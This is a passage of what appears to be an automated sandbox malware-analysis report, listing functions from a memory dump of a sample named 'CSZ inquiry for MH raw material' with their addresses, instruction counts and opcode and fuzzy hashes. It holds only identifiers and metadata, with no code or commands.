                                                • Instruction ID: 02d0db194d43b73451cad305a98c1f21baabac063ac44496f4eabf85e96f2cd9
                                                • Opcode Fuzzy Hash: 02415278e28e17b426a25e6d8372744753aa995d741d90e786672c00aeb9adaf
                                                • Instruction Fuzzy Hash: 70314D725012028BD771AF58CC90B6D77B4FF90314F54816EDD469F386EA34D986CBA0
                                                Function 015BC3CD Relevance: .1, Instructions: 88COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                • Instruction ID: dce55cfcd97d84dad50ed0eb441d6e8ca59423ea4bbe90f3b643f2b272749b2d
                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                • Instruction Fuzzy Hash: 73212D3A60065377CB15AB958840AFABBB4FFD0711F40881AFA558F651E639DA40C364
                                                Function 014FE420 Relevance: .1, Instructions: 88COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bcf9291530b48b065f4983e5dedab9a0839f81e497402de900af22fe712d6777
                                                • Instruction ID: f55d0a8000e60066303317ebad3a847fa7ac4ad7b6237924c5c4ebe5a0a70f4b
                                                • Opcode Fuzzy Hash: bcf9291530b48b065f4983e5dedab9a0839f81e497402de900af22fe712d6777
                                                • Instruction Fuzzy Hash: 4731D331A405199BDB319A18CC41BEA77B9AB55740F0201AAE745BB3B0E6749E818F90
                                                Function 01534588 Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                • Instruction ID: 928da031d9a1d3646903ce89dbe1f06b6ec5ab79d94f49a68ab8156771bb4507
                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                • Instruction Fuzzy Hash: A2218335A00649EFCB15CF58C980A8EBBF5FF88714F1080A9EE159F241D671EE05DB90
                                                Function 015344B0 Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54eeed24e57af9f1ebcfd8052f0c229df74b01567e38c1c285220b8609ae7142
                                                • Instruction ID: 2eef26d513838f9a423c7fdbe8c9bec19b12d0e21d80376d5a9f365b19e321ed
                                                • Opcode Fuzzy Hash: 54eeed24e57af9f1ebcfd8052f0c229df74b01567e38c1c285220b8609ae7142
                                                • Instruction Fuzzy Hash: BC218F72A047569BCB22DF18C880B6B7BE4FBC8760F054919F955AF681D730E9018BA2
                                                Function 015D03E6 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 053085cced715201d1777f7aecc6d311713ca444610b52c2a9240723fd8e1ec5
                                                • Instruction ID: 0d7d7f111c67d33121966502d9a3ddd1f85420bbc14accc889d88448d3dcc4a3
                                                • Opcode Fuzzy Hash: 053085cced715201d1777f7aecc6d311713ca444610b52c2a9240723fd8e1ec5
                                                • Instruction Fuzzy Hash: D5313071A00119ABCF14DBA8D894E9FBBB9FB88214F41412DF915EB240DA70AE44CBA0
                                                Function 014FE388 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                • Instruction ID: bed7a69d32f8015a4ccc867e61c2bbc9f52316bdb8c8bbeffe3786289eace6d0
                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                • Instruction Fuzzy Hash: DA318A31600605AFE721CF68C884F6AB7B9FF85354F1145AAE6129B3A1E730EE02CB50
                                                Function 0157E609 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca2018946f7c8f52e09e39cc005437c594ec6595301bb8504e933616792f9ccf
                                                • Instruction ID: cae0e0d5e70aac4829ff7d07a8b659cd3a6de811a5a6432af3aa3faf60451ea4
                                                • Opcode Fuzzy Hash: ca2018946f7c8f52e09e39cc005437c594ec6595301bb8504e933616792f9ccf
                                                • Instruction Fuzzy Hash: 71317F75600216DFCB14DF5CE8869AEB7F6FF84304B154499E8099F391E771EA50CB90
                                                Function 015D0591 Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8dd8438090b11bee37d88325d16f277d1f641360e347c2e0d9b1b0e865414bdc
                                                • Instruction ID: d729fb86a89fd568e7850f89eb0332c607587d2b66deb9585536b8faf5b11a18
                                                • Opcode Fuzzy Hash: 8dd8438090b11bee37d88325d16f277d1f641360e347c2e0d9b1b0e865414bdc
                                                • Instruction Fuzzy Hash: A2217E326102058FDB38CE2DD8806AAB7A2FBD5310FA54878ED15DF2C5D775E855C790
                                                Function 015806F1 Relevance: .1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 099499c9bd258d56feb0aed5a29af4e0fce8da53658b3bb9e9adfe80baad4b26
                                                • Instruction ID: c34be488f03d65a70f8198a02441c1decd10dcc3ee238d3cc2f8ef51856e0958
                                                • Opcode Fuzzy Hash: 099499c9bd258d56feb0aed5a29af4e0fce8da53658b3bb9e9adfe80baad4b26
                                                • Instruction Fuzzy Hash: 4721A07190012A9BDF11EF59C881ABEB7F4FF48740B510069F541FB290E738AD41CBA0
                                                Function 0158019F Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ca01925e73332b390880332bdd699f11612148728242e7b1154a19095e88e17
                                                • Instruction ID: f24413b2be3d74dfc46258f6a3ef190268368a1430dd5bf295dddfba75484ad9
                                                • Opcode Fuzzy Hash: 4ca01925e73332b390880332bdd699f11612148728242e7b1154a19095e88e17
                                                • Instruction Fuzzy Hash: F921A171600645AFD715EB6CD840F69B7B8FF88754F140169F905EB690E734ED40CB94
                                                Function 01580283 Relevance: .1, Instructions: 74COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd2f2e5b7c4457ecf239d87a43881ab4c1799b0b2360d34f4c5c92971d66b118
                                                • Instruction ID: 6a3e5071c363328eb3fe0ea4d5ede8a5b6e2a986bba8ae4a4684a841232de22b
                                                • Opcode Fuzzy Hash: dd2f2e5b7c4457ecf239d87a43881ab4c1799b0b2360d34f4c5c92971d66b118
                                                • Instruction Fuzzy Hash: C621C1725042469BE711FF59C844B5FBBDCBFD1250F080456B9809F291DB30C908C6A1
                                                Function 01522835 Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db4ac56b1e28559d3bd4828e6b7be188342e192c715d566574cf22eff13b0f13
                                                • Instruction ID: e290e44e8c3161f66395d87c18ade85fdeef5596e4a22ebd7395d7d2f9eb2703
                                                • Opcode Fuzzy Hash: db4ac56b1e28559d3bd4828e6b7be188342e192c715d566574cf22eff13b0f13
                                                • Instruction Fuzzy Hash: 3821F9367057929BF323576C8C14B297BD9BF82B74F190364FA20AF6D2DBA8C801C250
                                                Function 015D01AA Relevance: .1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 660a90b3d0def0bd1da674303e85a82717a4626eccac1ad77680c5954ce75de1
                                                • Instruction ID: 12637b0b8ecfc0234053efefd20f322bc83a160bcae9749d4c888cbab8613d89
                                                • Opcode Fuzzy Hash: 660a90b3d0def0bd1da674303e85a82717a4626eccac1ad77680c5954ce75de1
                                                • Instruction Fuzzy Hash: C421E4612042506FDB05CF1A88B44B6BFE5EFC7125B0A81FAE884CF7A3C524D81AC7A0
                                                Function 0153A30B Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7099675976c93c6de7b11645f35d3340047c07497632f928c755460cac930c08
                                                • Instruction ID: baf2c2199deb5be76bddbefa114adcc9d26cd6395c09b99f55df9940e31c9a3b
                                                • Opcode Fuzzy Hash: 7099675976c93c6de7b11645f35d3340047c07497632f928c755460cac930c08
                                                • Instruction Fuzzy Hash: AF217979211A029FD725DF29C901B56B7F5BF88B08F24846CA549CFB61E371E842CB94
                                                Function 015BA49A Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7d3be6285c6692efe16cae139245712d6b369b38a2273bbf4d5785117df6b84
                                                • Instruction ID: 00e1d8e8ec8fabe32bc41159088b1a0a8e4d3f0cc31c8836b37592e0f47f5fff
                                                • Opcode Fuzzy Hash: d7d3be6285c6692efe16cae139245712d6b369b38a2273bbf4d5785117df6b84
                                                • Instruction Fuzzy Hash: 2D110A72340A127FEB225655AC81FAB76D9FBD4B60F510428B719CF1D0EB70DD0187A5
                                                Function 01580946 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d27c7c7ede4ae8a1c3676c82c1e332085c830f2ae0910a2044d8f46da31dcac
                                                • Instruction ID: 631fce26fce57be0bccbf50e78b62940500bfc0bd7e83399b1c7564b5588b9c6
                                                • Opcode Fuzzy Hash: 9d27c7c7ede4ae8a1c3676c82c1e332085c830f2ae0910a2044d8f46da31dcac
                                                • Instruction Fuzzy Hash: 0321E5B1E40209ABDB20DFAAD8809AEFBF8FF98610F10012FE515EB290D7709945CB54
                                                Function 015980A8 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                • Instruction ID: 7ae48c8367105c83ced38d090973e188c04ddaffc8bc7f92ac0de62c23df97c0
                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                • Instruction Fuzzy Hash: 692181B290020AEFDF129F58CC40B9EBBB9FF89350F204455F900AB251D734D9509B50
                                                Function 015CEE26 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e15cc66c493ec87e1f16fcafaae683231044017e0eff3148481e84279e4a8e58
                                                • Instruction ID: 01d93adab2c06223d5805eeddd4b882b4782e520f90020da7ab498899c2c992b
                                                • Opcode Fuzzy Hash: e15cc66c493ec87e1f16fcafaae683231044017e0eff3148481e84279e4a8e58
                                                • Instruction Fuzzy Hash: 2821AF33A108119F9B18CF7CC80546AF7E6FFCD35436A427ED912DB2A4D670BA158A84
                                                Function 01530124 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                • Instruction ID: d37047259dad0c441b5a36fd9975d18007a774803fde577482529811605d3871
                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                • Instruction Fuzzy Hash: 9F11DD72600706AFE722DA58CC81F9ABBB8FBD0764F100429F6058F190E671ED44DB60
                                                Function 01508770 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5181d11936f6d4c1da24dcebee36d1e4d69a40bde6f59957180cf1a9d9fd1f95
                                                • Instruction ID: f0eeeea8da5cfd53f900aa7ab01ca0677c0ca59c476c9155ccd68274bd13a4fd
                                                • Opcode Fuzzy Hash: 5181d11936f6d4c1da24dcebee36d1e4d69a40bde6f59957180cf1a9d9fd1f95
                                                • Instruction Fuzzy Hash: 5711B231B006119BDB16CF8DC480E5ABBE9BF9A710B18407DEE089F249D6B2D9018B90
                                                Function 0153AAEE Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                • Instruction ID: e5c2d663b6fa3ff9967a9fcf501e4e2243fc17ded3f51f2a1b33c3b0a02291e0
                                                • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                • Instruction Fuzzy Hash: C3217972600A41DFD72A9F49C560A6ABBE6FBD5B10F14887DE58ACB610C731EC01CB80
                                                Function 015080E9 Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 109b282de417689e56769a3ef798365f0e1a8e3e609426937603ff6b248b5e7b
                                                • Instruction ID: b0b0317616a573e3dc99673da31d5b33654b0815459a4f7b6f2b493170fff896
                                                • Opcode Fuzzy Hash: 109b282de417689e56769a3ef798365f0e1a8e3e609426937603ff6b248b5e7b
                                                • Instruction Fuzzy Hash: 0D216835A00206DFCB15CF98C580AAEBBB5FF88318F20416DD105AB350CB71AD06CB90
                                                Function 0153674D Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 166e74b8905a6ed9c5ac579072f3773007384dfbe5622f68b298745ad89fcc40
                                                • Instruction ID: e23ab528374f2d4ca6be32bcef41287752c8bd4ac7e9432060939736950cd065
                                                • Opcode Fuzzy Hash: 166e74b8905a6ed9c5ac579072f3773007384dfbe5622f68b298745ad89fcc40
                                                • Instruction Fuzzy Hash: 7E216075510A01EFD7219F69C841F66B7F8FF84250F44882DE59ACB250EB70B950CB60
                                                Function 01596870 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8c94f536ce5d01c217e555b6962ffc68940dc11ef6262aee2e562d482f61f566
                                                • Instruction ID: f5787c4e668c1dae488f2417b860cc6fb9db6d7fc5f4ab57ed066be603625df0
                                                • Opcode Fuzzy Hash: 8c94f536ce5d01c217e555b6962ffc68940dc11ef6262aee2e562d482f61f566
                                                • Instruction Fuzzy Hash: 04118F32240515AFDB22DBADC940F9A7BE8BB95660F114025F205DF261EB70E90987A1
                                                Function 0152E8C0 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 28866ccf81923f21a086739d45ab6d1015b0de37bf9f505722584b94cb73d46c
                                                • Instruction ID: 913dda248958b4eddc2177e73dced244e9f380ffda58a0c3ad0630c02be6c6bb
                                                • Opcode Fuzzy Hash: 28866ccf81923f21a086739d45ab6d1015b0de37bf9f505722584b94cb73d46c
                                                • Instruction Fuzzy Hash: 63110C337051155FDB1ADB29DC51A6F729AFFD6374B25492AE5228F294EA309801C390
                                                Function 015366B0 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5371e0dd6dd5da1db978db9b1235f4aa613dee0e4deb458df56e0863c1d92222
                                                • Instruction ID: 9cb778aaece8f8a565722dc1c2865c25b13f38893ac526ecc268e916e4fc53b1
                                                • Opcode Fuzzy Hash: 5371e0dd6dd5da1db978db9b1235f4aa613dee0e4deb458df56e0863c1d92222
                                                • Instruction Fuzzy Hash: 90118C76A01206ABCB26CF99C580A5ABBE9BFD4650B56407DD905DF315E634EE00CBA0
                                                Function 015CA8E4 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                • Instruction ID: 5b9da76b9040c919ca3f8b69b84ee6e3c3ae63cc54ff3eb9dcb49eff6268ea6d
                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                • Instruction Fuzzy Hash: 6E11E236A0090AAFDB19CF98C841A9DBBB5FFC4610F058269E8459B340E671AD01CB80
                                                Function 01500AD0 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                • Instruction ID: 29a5cbbc92a9aeeb74f62d438cd7dcfc8ff755eafab0943f0337f3a88e879d2a
                                                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                • Instruction Fuzzy Hash: A22106B5A00B059FD3A0CF29D441B56BBF4FB48B10F10492EE98ACBB40E371E814CB90
                                                Function 0158E7E1 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                • Instruction ID: 8f11a2c146a9e967156171fc516f21f296ce218751283c1c24d5c46cb47bca18
                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                • Instruction Fuzzy Hash: 30119E32620601EFE721AF49C846B5EBBF5FB86754F058428EA09AF160DB71DC41DF90
                                                Function 015227ED Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29537cfaded60625eed0e15910a684117b70edb9150b32661425863528e5c0a1
                                                • Instruction ID: 2a0c8e5c47052b0846b6d2d10117ec3203106095692a14c4398c6e8568a95e01
                                                • Opcode Fuzzy Hash: 29537cfaded60625eed0e15910a684117b70edb9150b32661425863528e5c0a1
                                                • Instruction Fuzzy Hash: A4012636305686ABF326A66EDC44F2B7BDCFF91390F050465F9009F291D954DC00C2B1
                                                Function 01504690 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6892bab2cd37c44aa5a7efad6d20a12168e3809f7199808479846e57e31d200d
                                                • Instruction ID: 05c73d30e4e2b53c09ee410bc95c3acf26cc82cbac66b3ea5335e63cfb5170be
                                                • Opcode Fuzzy Hash: 6892bab2cd37c44aa5a7efad6d20a12168e3809f7199808479846e57e31d200d
                                                • Instruction Fuzzy Hash: 9711A076200645AFDB27DF9DD940B5A7BA4FB86B64F14461AFA058F6A0C370E801CF60
                                                Function 015D4B00 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d3a22331c32baeed6efb0f537bd98f781586d6eb05b0dd4f4a546f0ecdc4afdb
                                                • Instruction ID: 86e25276549b4aec253140d1aa8df10a538b68858a2585c0ffd2eea6835856da
                                                • Opcode Fuzzy Hash: d3a22331c32baeed6efb0f537bd98f781586d6eb05b0dd4f4a546f0ecdc4afdb
                                                • Instruction Fuzzy Hash: D011C6362006119FEB329B6DD844F6BB7A6FFD5710F154429E696CFA94DA30A802CB90
                                                Function 01536620 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
